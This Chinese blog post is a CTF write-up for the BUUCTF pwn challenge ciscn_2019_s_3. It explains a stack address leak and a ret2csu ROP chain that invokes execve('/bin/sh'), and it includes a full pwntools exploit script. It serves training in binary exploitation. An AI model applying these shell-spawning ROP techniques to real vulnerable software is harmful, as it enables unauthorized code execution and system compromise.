BUUCTF--ciscn_2019_s_31

最新推荐文章于 2024-07-03 16:17:13 发布
最新推荐文章于 2024-07-03 16:17:13 发布
阅读量374 收藏 12
点赞数 7
分类专栏: pwn CTF 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135463171
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

这题是一题ret2csu,先查看下保护:

64位架构的程序,那么传参就是寄存器传参了。开启了NX,也不存在ret2shellocde。接下来黑盒测试下:

输入一个字节都能触发段错误,并且还跟了一串不知道啥来的东西,盲猜是栈上的数据泄露。

紧接着我们进入IDA中分析下程序逻辑:

代码很简单,但是这个题,还是看汇编会比较好看:

分别进行了两次系统调用,一个是read,一个是write。从上面我们可以看到buf的大小是16,但是write的大小有0x30,肯定是泄露了栈上的其他信息。

在代码中我们还发现了一个系统调用号,这个系统调用号对应的是execve:

那么接下来就是步骤rop的事情了,程序中有scu

我们需要利用的就是这部分代码。接下来是漏洞利用的分析步骤:

1.泄露栈地址并返回到主函数,构造第二次payload

2.第二次布局将bin/sh参数以及返回地址覆盖成我们的rop链子

3.rop布局:

ret_rax_59->ret_400596->pop_rbx->pop_rbp->pop_r12->pop_r13->pop_r14->pop_r15->ret_400580->'a'*56(因为会再次pop_rbx到pop_r15)->pop_rdi->bin/sh参数地址->syscall参数

这个rop布局看上去挺复杂的。不过仔细理理还是很容易理解的。exp如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')
#p=remote('')
context.log_level = 'debug'
 
main_addr = elf.symbols['main']
csu_end = 0x040059A
csu_front = 0x0400580
ret_addr = 0x004003a9
rax_59_ret = 0x04004E2
pop_rdi=0x00000000004005a3
print(hex(main_addr))

gdb.attach(p)
payload = '/bin/sh\x00' +'B'*8 + p64(main_addr)
pause()
p.sendline(payload)
pause()
p.recv(0x20)
stack_addr = u64(p.recv(8))   #写入binsh后,由于write的大小为0x30于是我们随便泄露一个地址后用偏移以后的栈相对位置来标记binsh的位置
print ('stack_addr-->' + hex(stack_addr))


binsh=stack_addr-0x138
rax=binsh+0x10
system=0x0000000000400517

#$rax==59
#$rdi==/bin/sh
#$rsi==0
#$rdx==0
#syscall
 
payload = '/bin/sh\x00' + 'A'*0x8 +p64(rax_59_ret) + p64(csu_end)  #一次利用gadget来改变寄存器的值来调用,但是调用csu还会有个rdi,我们可以重复填入rax调用
payload += p64(0) + p64(1) + p64(rax) + p64(0) + p64(0) + p64(0)
payload += p64(csu_front)
payload +='a'*56 
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)


p.sendline(payload)

pause()

p.interactive()

call就不要ret
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
buuctf-ciscn_2019_s_3(ret2csu
fuiifiuiii的博客
02-26 353
为了直接利用到0x40058d的call [r12+rbx*8],所以把rbx置为0,[r12]会是我们要call调用的地方,也就是r12寄存器保存的地址指向的位置。(但是真的好晕好绕,本来搜着想看看别人的用这种做的简单方法,结果没有搜到有用这种做的,就分享一下。call执行之后,可以发现原本的下一步被压入栈中,需要把它pop掉才能正常执行我们想要的操作,这也是这里写入pop_rdi的原因。发现打csu的没有直接去利用call[r12+rbx*8],都是通过更改判定,二次执行后半段,再ret到需要的地址。
BUUCTF Ret2Csu ciscn_s_3
红叶的博客
02-20 382
经过几个月的假期都忘完了,趁着最近有点时间复健一下,顺便弄明白了不少以前还不会的东西。
【GYCTF2020】borrowstack------<栈迁移原理、ret2csu万能gadget、one-gadget工具>
qq_21746331的博客
01-22 1156
【GYCTF2020】borrowstack知识点关键字样本知识点详解0x1 ret2csu原理0x2 栈迁移原理0x3 one-gadget 工具样本分析0x1 静态分析0x2 payload 构造0x3 动态调试0x4 exp参考文献 知识点关键字 栈迁移、ROP、csu万能gadget、one-gadget 样本 样本来自于GYTF2020_borrowstack,BUUCTF上有练习环境 知识点详解 0x1 ret2csu原理 动机: 在 64 位程序中,函数的前 6 个参数是通过寄存器传递
BUUCTF PWN ciscn_2019_s_9
Rt1Text的博客
04-22 247
1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数 提示函数,很有帮助,解题关键点 直接跳到esp栈顶指针 2.pwn函数 明显的fgets()函数溢出 跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下 所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 233
ciscn_2019_s_9
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1618
buuctf ciscn_2019_ne_5题目分析
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 997
[buuctf]ciscn_2019_s_9
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 259
【CTF】BUUCTF-ciscn_2019_en_2 pwn
BUUCTF刷题之路-ciscn_2019_s_31
qq_30528603的博客
05-31 341
既然是栈溢出嘛,我们当然想调用system('/bin/sh')很可惜的是程序中没有给出,那就考虑是不是ret2libc,但是程序中我们并没有发现存在泄漏got表的代码,在看一眼函数列表我们看到了一个程序必带的初始化函数:_libc_csu_init这是做csu题目的基础。首先rax=59并且syscall的地址我们都已经有了,接着我们看如何构造bin/sh,我尝试过在程序中查找字符串,并没有结果,那么我们只能通过read函数写进去,并且我们准确把握写入的位置以便利用,所以我们需要泄露栈地址。
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 347
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
Always-Y#Binary_study#IDA-Linux远程调试1
07-25
起因今天刷BUUCTF第三题 Reverse2,由于该程序石ELF格式,只能运行在Linux,动态调试需要GDB,对此我并不熟悉因此,跟大佬学习了,将软件放在L
新型开发语言的试用感受-仓颉语言发布之际
opendba的专栏
07-03 1701
Zig、Odin、Mojo、codon、carbon、nim等语言的使用感受
MongoDB的Linux安装、基本操作、可视化、实验源码与报告文档
最新发布
07-10
MongoDB的Linux安装 在Linux上安装MongoDB,通常可以通过包管理器(如apt-get、yum等)或从MongoDB官网下载压缩包进行手动安装。以下是通过包管理器安装MongoDB的简要步骤(以Ubuntu为例): 更新系统: 打开终端,使用sudo apt-get update命令更新系统包列表。 安装MongoDB: 使用sudo apt-get install -y mongodb命令安装MongoDB。这将自动处理依赖关系,并安装MongoDB服务器。 启动MongoDB服务: 安装完成后,可以使用sudo systemctl start mongod命令启动MongoDB服务。 验证安装: 使用mongo命令连接到MongoDB shell,如果能够成功连接并显示MongoDB的shell提示符,则表示MongoDB已成功安装并正在运行。 注意:以上步骤是基于Ubuntu系统的示例。对于其他Linux发行版,安装命令可能有所不同。此外,也可以从MongoDB官网下载.tgz压缩包进行手动安装,具体步骤包括下载、解压、配置环境变量、创建数据存储目录等。 M
数据质量管理(41页 PPT).ppt
07-10
数据质量管理(41页 PPT)
宁波市建筑物矢量数据(Shp格式+带高度).txt
07-09
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值